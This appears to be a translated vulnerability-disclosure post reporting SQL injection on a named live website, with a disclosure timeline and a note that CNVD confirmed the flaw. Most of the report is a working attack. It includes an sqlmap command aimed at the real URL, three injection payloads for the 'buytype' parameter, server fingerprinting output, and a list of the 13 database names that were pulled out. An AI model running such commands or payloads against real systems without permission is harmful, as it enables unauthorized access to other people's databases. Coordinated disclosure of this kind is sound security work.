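2014-11-28: Details reported to the vendor; awaiting vendor response
2014-12-03: Vendor confirmed; details disclosed to the vendor only
2014-12-13: Details disclosed to core white hats and experts in related fields
2014-12-23: Details disclosed to regular white hats
2015-01-02: Details disclosed to intern white hats
2015-01-12: Details disclosed to the public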
As the title says.
http://www.66tx.cn/
[root@Hacker~]# Sqlmap
sqlmap -u "http://www.66tx.cn/product/list_c300.html?buytype=2&RentPriceMin=undefined&RentPriceMax=undefined&KeyWords=55&code=&iscert=fal

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable

[*] starting at 09:11:38

[09:11:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:11:38] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: buytype
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: buytype=(SELECT (CASE WHEN (6348=6348) THEN 2 ELSE 6348*(SELECT 6348 FROM master..sysdatabases) END))&RentPriceMin=undefined&RentPriceMax=undefined

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: buytype=2 AND 9919=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9919=9919) THEN CHAR(49) ELSE CHAR(48)

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: buytype=2 AND 1028=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysu
---
[09:11:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[09:11:38] [INFO] fetching database names
[09:11:38] [INFO] the SQL query used returns 13 entries
[09:11:38] [INFO] resumed: Air
[09:11:38] [INFO] resumed: gcwzwl
[09:11:38] [INFO] resumed: InsuranceProject
[09:11:38] [INFO] resumed: master
[09:11:38] [INFO] resumed: model
[09:11:38] [INFO] resumed: msdb
[09:11:38] [INFO] resumed: ReportServer
[09:11:39] [INFO] resumed: ReportServerTempDB
[09:11:39] [INFO] resumed: taizhang
[09:11:39] [INFO] resumed: tempdb
[09:11:39] [INFO] resumed: wuliu_scwl
[09:11:39] [INFO] resumed: wuliu_scwl_new
[09:11:39] [INFO] resumed: wuliu_ya
available databases [13]:
[*] Air
[*] gcwzwl
[*] InsuranceProject
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] taizhang
[*] tempdb
[*] wuliu_scwl
[*] wuliu_scwl_new
[*] wuliu_ya

[09:11:39] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
[09:11:39] [INFO] fetched data logged to text files under 'H:\360?~1\SQLMAP~1.4\Bin\output\www.66tx.cn'
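Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-12-03 16:07
CNVD confirmed and reproduced the reported issue and has passed it through CNCERT to the Sichuan sub-center, which will follow up and coordinate with the organization that manages the site to handle it.
None yet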